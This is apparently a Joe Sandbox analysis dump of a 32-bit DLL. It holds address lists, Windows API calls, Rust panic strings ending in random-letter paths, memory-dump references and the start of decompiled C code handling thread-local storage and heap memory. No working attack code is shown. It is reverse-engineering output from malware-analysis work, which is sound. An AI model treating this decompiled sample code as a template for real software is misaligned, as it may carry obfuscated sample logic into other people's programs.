                                                                                                                                                                                      0x6e9dc815
                                                                                                                                                                                      0x6e9dc81c
                                                                                                                                                                                      0x6e9dc823
                                                                                                                                                                                      0x6e9dc828
                                                                                                                                                                                      0x6e9dc82a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc830
                                                                                                                                                                                      0x6e9dc835
                                                                                                                                                                                      0x6e9dc83d
                                                                                                                                                                                      0x6e9dc840
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc785
                                                                                                                                                                                      0x6e9dc78b
                                                                                                                                                                                      0x6e9dc795
                                                                                                                                                                                      0x6e9dc79c
                                                                                                                                                                                      0x6e9dc7a3
                                                                                                                                                                                      0x6e9dc7a9
                                                                                                                                                                                      0x6e9dc7ac
                                                                                                                                                                                      0x6e9dc7af
                                                                                                                                                                                      0x6e9dc7b2
                                                                                                                                                                                      0x6e9dc7b5
                                                                                                                                                                                      0x6e9dc7ba
                                                                                                                                                                                      0x6e9dc7bd
                                                                                                                                                                                      0x6e9dc7bf
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f6
                                                                                                                                                                                      0x6e9dc8f8
                                                                                                                                                                                      0x6e9dc9cb
                                                                                                                                                                                      0x6e9dc9d0
                                                                                                                                                                                      0x6e9dc9d3
                                                                                                                                                                                      0x6e9dc9d6
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x6e9dc9dc
                                                                                                                                                                                      0x6e9dc9df
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x6e9dc9e5
                                                                                                                                                                                      0x6e9dc9e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9f0
                                                                                                                                                                                      0x6e9dc9f5
                                                                                                                                                                                      0x6e9dc9f8
                                                                                                                                                                                      0x6e9dc9fb
                                                                                                                                                                                      0x6e9dc9fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x6e9dc8fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc7c5
                                                                                                                                                                                      0x6e9dc7dd
                                                                                                                                                                                      0x6e9dc7e2
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc05
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc936
                                                                                                                                                                                      0x6e9dc939
                                                                                                                                                                                      0x6e9dc940
                                                                                                                                                                                      0x6e9dc942
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc94d
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca38
                                                                                                                                                                                      0x6e9dca3a
                                                                                                                                                                                      0x6e9dca3c
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca47
                                                                                                                                                                                      0x6e9dca4d
                                                                                                                                                                                      0x6e9dca4f
                                                                                                                                                                                      0x6e9dcc0f
                                                                                                                                                                                      0x6e9dcc14
                                                                                                                                                                                      0x6e9dcc16
                                                                                                                                                                                      0x6e9dcc26
                                                                                                                                                                                      0x6e9dcc2b
                                                                                                                                                                                      0x6e9dcc30
                                                                                                                                                                                      0x6e9dcc32
                                                                                                                                                                                      0x6e9dcc72
                                                                                                                                                                                      0x6e9dcc78
                                                                                                                                                                                      0x6e9dcc7f
                                                                                                                                                                                      0x6e9dcc81
                                                                                                                                                                                      0x6e9dcc86
                                                                                                                                                                                      0x6e9dcc88
                                                                                                                                                                                      0x6e9dcc8f
                                                                                                                                                                                      0x6e9dcc92
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x6e9dcc34
                                                                                                                                                                                      0x6e9dcc3e
                                                                                                                                                                                      0x6e9dcc43
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc48
                                                                                                                                                                                      0x6e9dcc4b
                                                                                                                                                                                      0x6e9dcc4e
                                                                                                                                                                                      0x6e9dccf8
                                                                                                                                                                                      0x6e9dccfe
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd12
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd2d
                                                                                                                                                                                      0x6e9dcd35
                                                                                                                                                                                      0x6e9dcd38
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc907
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc910
                                                                                                                                                                                      0x6e9dc913
                                                                                                                                                                                      0x6e9dc915
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc925
                                                                                                                                                                                      0x6e9dca0d
                                                                                                                                                                                      0x6e9dca10
                                                                                                                                                                                      0x6e9dca1e
                                                                                                                                                                                      0x6e9dca20
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca26
                                                                                                                                                                                      0x6e9dca29
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x6e9dc92b
                                                                                                                                                                                      0x6e9dc92e
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x6e9dcd00
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x6e9dcc54
                                                                                                                                                                                      0x6e9dcc57
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc5d
                                                                                                                                                                                      0x6e9dcc60
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc66
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x6e9dcc18
                                                                                                                                                                                      0x6e9dcc1d
                                                                                                                                                                                      0x6e9dcc1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca57
                                                                                                                                                                                      0x6e9dca5a
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca5
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dccab
                                                                                                                                                                                      0x6e9dccb1
                                                                                                                                                                                      0x6e9dccb8
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dccc5
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x6e9dcccd
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dca60
                                                                                                                                                                                      0x6e9dca67
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dc95c
                                                                                                                                                                                      0x6e9dc95f
                                                                                                                                                                                      0x6e9dc961
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc967
                                                                                                                                                                                      0x6e9dc96a
                                                                                                                                                                                      0x6e9dc96d
                                                                                                                                                                                      0x6e9dcbf6
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x6e9dc973
                                                                                                                                                                                      0x6e9dc979
                                                                                                                                                                                      0x6e9dc97e
                                                                                                                                                                                      0x6e9dc980
                                                                                                                                                                                      0x6e9dc983
                                                                                                                                                                                      0x6e9dc98a
                                                                                                                                                                                      0x6e9dc98f
                                                                                                                                                                                      0x6e9dc992
                                                                                                                                                                                      0x6e9dc994
                                                                                                                                                                                      0x6e9dc997
                                                                                                                                                                                      0x6e9dc999
                                                                                                                                                                                      0x6e9dc99b
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a0
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9ab
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b8
                                                                                                                                                                                      0x6e9dc9bb
                                                                                                                                                                                      0x6e9dc9be
                                                                                                                                                                                      0x6e9dcce0
                                                                                                                                                                                      0x6e9dcce6
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcceb
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea7
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dca70
                                                                                                                                                                                      0x6e9dca77
                                                                                                                                                                                      0x6e9dca7e
                                                                                                                                                                                      0x6e9dca85
                                                                                                                                                                                      0x6e9dca8c
                                                                                                                                                                                      0x6e9dca90
                                                                                                                                                                                      0x6e9dca97
                                                                                                                                                                                      0x6e9dca9e
                                                                                                                                                                                      0x6e9dcaa5
                                                                                                                                                                                      0x6e9dcaad
                                                                                                                                                                                      0x6e9dcab0
                                                                                                                                                                                      0x6e9dcab6
                                                                                                                                                                                      0x6e9dcab9
                                                                                                                                                                                      0x6e9dcabf
                                                                                                                                                                                      0x6e9dcac5
                                                                                                                                                                                      0x6e9dcacc
                                                                                                                                                                                      0x6e9dcad5
                                                                                                                                                                                      0x6e9dcadc
                                                                                                                                                                                      0x6e9dcae2
                                                                                                                                                                                      0x6e9dcae9
                                                                                                                                                                                      0x6e9dcaec
                                                                                                                                                                                      0x6e9dcafa
                                                                                                                                                                                      0x6e9dcb01
                                                                                                                                                                                      0x6e9dcb09
                                                                                                                                                                                      0x6e9dcb0c
                                                                                                                                                                                      0x6e9dcb0e
                                                                                                                                                                                      0x6e9dcb11
                                                                                                                                                                                      0x6e9dcb14
                                                                                                                                                                                      0x6e9dcb1b
                                                                                                                                                                                      0x6e9dcb1d
                                                                                                                                                                                      0x6e9dcb23
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb44
                                                                                                                                                                                      0x6e9dcb55
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dcd4b
                                                                                                                                                                                      0x6e9dcd5a
                                                                                                                                                                                      0x6e9dcd61
                                                                                                                                                                                      0x6e9dcd68
                                                                                                                                                                                      0x6e9dcd72
                                                                                                                                                                                      0x6e9dcd75
                                                                                                                                                                                      0x6e9dcd7c
                                                                                                                                                                                      0x6e9dcd83
                                                                                                                                                                                      0x6e9dcd89
                                                                                                                                                                                      0x6e9dcd90
                                                                                                                                                                                      0x6e9dcd93
                                                                                                                                                                                      0x6e9dcd9a
                                                                                                                                                                                      0x6e9dcd9f
                                                                                                                                                                                      0x6e9dcda8
                                                                                                                                                                                      0x6e9dcdae
                                                                                                                                                                                      0x6e9dcdb1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdb8
                                                                                                                                                                                      0x6e9dcdc0
                                                                                                                                                                                      0x6e9dcdc3
                                                                                                                                                                                      0x6e9dcdc5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb60
                                                                                                                                                                                      0x6e9dcb63
                                                                                                                                                                                      0x6e9dce00
                                                                                                                                                                                      0x6e9dce03
                                                                                                                                                                                      0x6e9dce05
                                                                                                                                                                                      0x6e9dce07
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce17
                                                                                                                                                                                      0x6e9dce1d
                                                                                                                                                                                      0x6e9dce23
                                                                                                                                                                                      0x6e9dce25
                                                                                                                                                                                      0x6e9dce27
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce39
                                                                                                                                                                                      0x6e9dce3f
                                                                                                                                                                                      0x6e9dce43
                                                                                                                                                                                      0x6e9dce4a
                                                                                                                                                                                      0x6e9dce52
                                                                                                                                                                                      0x6e9dce59
                                                                                                                                                                                      0x6e9dce60
                                                                                                                                                                                      0x6e9dce67
                                                                                                                                                                                      0x6e9dce6e
                                                                                                                                                                                      0x6e9dce72
                                                                                                                                                                                      0x6e9dce79
                                                                                                                                                                                      0x6e9dce80
                                                                                                                                                                                      0x6e9dce88
                                                                                                                                                                                      0x6e9dce8b
                                                                                                                                                                                      0x6e9dce8e
                                                                                                                                                                                      0x6e9dce93
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce97
                                                                                                                                                                                      0x6e9dce9b
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x6e9dcb6b
                                                                                                                                                                                      0x6e9dcb71
                                                                                                                                                                                      0x6e9dcb73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb7c
                                                                                                                                                                                      0x6e9dcb7f
                                                                                                                                                                                      0x6e9dcb86
                                                                                                                                                                                      0x6e9dcb8d
                                                                                                                                                                                      0x6e9dcb94
                                                                                                                                                                                      0x6e9dcb9b
                                                                                                                                                                                      0x6e9dcba2
                                                                                                                                                                                      0x6e9dcbb0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbbb
                                                                                                                                                                                      0x6e9dcbbe
                                                                                                                                                                                      0x6e9dcbc6
                                                                                                                                                                                      0x6e9dcbc8
                                                                                                                                                                                      0x6e9dcdc8
                                                                                                                                                                                      0x6e9dcdcb
                                                                                                                                                                                      0x6e9dcdd2
                                                                                                                                                                                      0x6e9dcddb
                                                                                                                                                                                      0x6e9dcddd
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dc7bf

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9DD000: TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD00B
                                                                                                                                                                                        • Part of subcall function 6E9DD000: TlsGetValue.KERNEL32(00000000), ref: 6E9DD043
                                                                                                                                                                                      • AcquireSRWLockShared.KERNEL32(6EA2E11C), ref: 6E9DC785
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DC8DC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DC8EA
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DC94D
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DCA47
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DCB31
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DCB3F
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DCC18
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,00000010), ref: 6E9DCC2B
                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000,00720000,00000000,00000010), ref: 6E9DCC9C
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00720000,00000000,00000010), ref: 6E9DCD1D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E9DCC00
                                                                                                                                                                                      • cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6E9DC74D, 6E9DC7C8
                                                                                                                                                                                      • already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6E9DCBE1
                                                                                                                                                                                      • full, xrefs: 6E9DCCF8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                                                                                                                                                                                      • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
                                                                                                                                                                                      • API String ID: 2275035175-262129955
                                                                                                                                                                                      • Opcode ID: d1da2affb12e313f3984f3019ae5193f63be601d997904b2bc135ae23cb3972b
                                                                                                                                                                                      • Instruction ID: e24f3c7e771635f2593ad975b90b0fae3d25526f399ea203238f321a184431b5
                                                                                                                                                                                      • Opcode Fuzzy Hash: d1da2affb12e313f3984f3019ae5193f63be601d997904b2bc135ae23cb3972b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 671256B4A04A298FEB11CFE4C954B9EBBB9BF49304F208529D415BF240D775E84ACF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                      			E6E9DC6D0(long _a4, signed int _a8) {
                                                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                      				void _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                      				char _v41;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				long* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				long _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				long* _v68;
                                                                                                                                                                                      				long _v72;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				long* _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				long _v92;
                                                                                                                                                                                      				char* _v96;
                                                                                                                                                                                      				long _v100;
                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                      				void** _v108;
                                                                                                                                                                                      				void* _v112;
                                                                                                                                                                                      				long _v116;
                                                                                                                                                                                      				void* _v120;
                                                                                                                                                                                      				long _v124;
                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                      				void _v136;
                                                                                                                                                                                      				void* _v140;
                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				intOrPtr _v152;
                                                                                                                                                                                      				intOrPtr* _t193;
                                                                                                                                                                                      				void* _t197;
                                                                                                                                                                                      				void _t198;
                                                                                                                                                                                      				intOrPtr* _t199;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				signed int _t202;
                                                                                                                                                                                      				char* _t204;
                                                                                                                                                                                      				long _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				void* _t207;
                                                                                                                                                                                      				void* _t208;
                                                                                                                                                                                      				long _t209;
                                                                                                                                                                                      				void _t212;
                                                                                                                                                                                      				void _t213;
                                                                                                                                                                                      				void* _t222;
                                                                                                                                                                                      				void* _t225;
                                                                                                                                                                                      				long _t229;
                                                                                                                                                                                      				void* _t238;
                                                                                                                                                                                      				void* _t248;
                                                                                                                                                                                      				void* _t250;
                                                                                                                                                                                      				void* _t251;
                                                                                                                                                                                      				char** _t254;
                                                                                                                                                                                      				char** _t255;
                                                                                                                                                                                      				void* _t259;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void _t268;
                                                                                                                                                                                      				char _t269;
                                                                                                                                                                                      				signed char _t271;
                                                                                                                                                                                      				void* _t274;
                                                                                                                                                                                      				void _t275;
                                                                                                                                                                                      				intOrPtr _t278;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				char* _t281;
                                                                                                                                                                                      				void _t282;
                                                                                                                                                                                      				void _t285;
                                                                                                                                                                                      				intOrPtr _t296;
                                                                                                                                                                                      				intOrPtr _t300;
                                                                                                                                                                                      				void _t303;
                                                                                                                                                                                      				long _t307;
                                                                                                                                                                                      				intOrPtr _t312;
                                                                                                                                                                                      				void* _t314;
                                                                                                                                                                                      				void* _t315;
                                                                                                                                                                                      				signed int _t316;
                                                                                                                                                                                      				signed int _t318;
                                                                                                                                                                                      				void* _t324;
                                                                                                                                                                                      				intOrPtr* _t330;
                                                                                                                                                                                      				long _t332;
                                                                                                                                                                                      				void* _t333;
                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                      				void _t338;
                                                                                                                                                                                      				void* _t340;
                                                                                                                                                                                      				void* _t341;
                                                                                                                                                                                      				void* _t342;
                                                                                                                                                                                      				void* _t343;
                                                                                                                                                                                      				void _t346;
                                                                                                                                                                                      				void* _t347;
                                                                                                                                                                                      				void* _t348;
                                                                                                                                                                                      				void* _t359;
                                                                                                                                                                                      				void* _t372;
                                                                                                                                                                                      				long _t373;
                                                                                                                                                                                      
                                                                                                                                                                                      				 *_t346 = _t274;
                                                                                                                                                                                      				_v4 = _t312;
                                                                                                                                                                                      				_t275 = _t346;
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				L1();
                                                                                                                                                                                      				_t347 = _t346 + 8;
                                                                                                                                                                                      				asm("ud2");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				_t348 = _t347 - 0x88;
                                                                                                                                                                                      				_v40 = _t348;
                                                                                                                                                                                      				_v28 = 0xffffffff;
                                                                                                                                                                                      				_v32 = E6E9E39A0;
                                                                                                                                                                                      				_t268 = _t275;
                                                                                                                                                                                      				_t340 = 1;
                                                                                                                                                                                      				_t337 = 0x6ea201dc;
                                                                                                                                                                                      				_v36 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v36;
                                                                                                                                                                                      				asm("lock xadd [0x6ea2e120], esi");
                                                                                                                                                                                      				_t193 = E6E9DD000(_t268, 0x6ea201dc);
                                                                                                                                                                                      				_t349 = _t193;
                                                                                                                                                                                      				if(_t193 == 0) {
                                                                                                                                                                                      					_t193 = E6E9F95A0(_t268,  &M6EA1F8F7, 0x46, _t349,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      					_t348 = _t348 + 0xc;
                                                                                                                                                                                      					asm("ud2");
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t314 = _a8;
                                                                                                                                                                                      				_t278 =  *_t193 + 1;
                                                                                                                                                                                      				 *_t193 = _t278;
                                                                                                                                                                                      				if(_t340 < 0 || _t278 >= 3) {
                                                                                                                                                                                      					__eflags = _t278 - 2;
                                                                                                                                                                                      					if(__eflags <= 0) {
                                                                                                                                                                                      						_v124 = 0x6ea1f570;
                                                                                                                                                                                      						_v120 = 0x6ea1f824;
                                                                                                                                                                                      						_v68 = 0x6ea20260;
                                                                                                                                                                                      						_v64 = 2;
                                                                                                                                                                                      						_v96 = 0;
                                                                                                                                                                                      						_v100 = 0;
                                                                                                                                                                                      						_v60 = 0;
                                                                                                                                                                                      						_v116 = _a4;
                                                                                                                                                                                      						_v112 = _t314;
                                                                                                                                                                                      						_t315 =  &_v68;
                                                                                                                                                                                      						_v80 =  &_v124;
                                                                                                                                                                                      						_v76 = E6E9D2470;
                                                                                                                                                                                      						_v52 =  &_v80;
                                                                                                                                                                                      						_v48 = 1;
                                                                                                                                                                                      						_t197 = E6E9DD0F0( &_v100, __eflags);
                                                                                                                                                                                      						__eflags = _t197 - 3;
                                                                                                                                                                                      						if(_t197 == 3) {
                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                      							_v36 = _t315;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
                                                                                                                                                                                      							_t348 = _t348 + 4;
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							_t340 = _v36;
                                                                                                                                                                                      							_t307 =  *(_t340 + 4);
                                                                                                                                                                                      							__eflags =  *(4 + _t307);
                                                                                                                                                                                      							if( *(4 + _t307) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t259);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t197 = HeapFree( *0x6ea2e128, 0, _t340);
                                                                                                                                                                                      						}
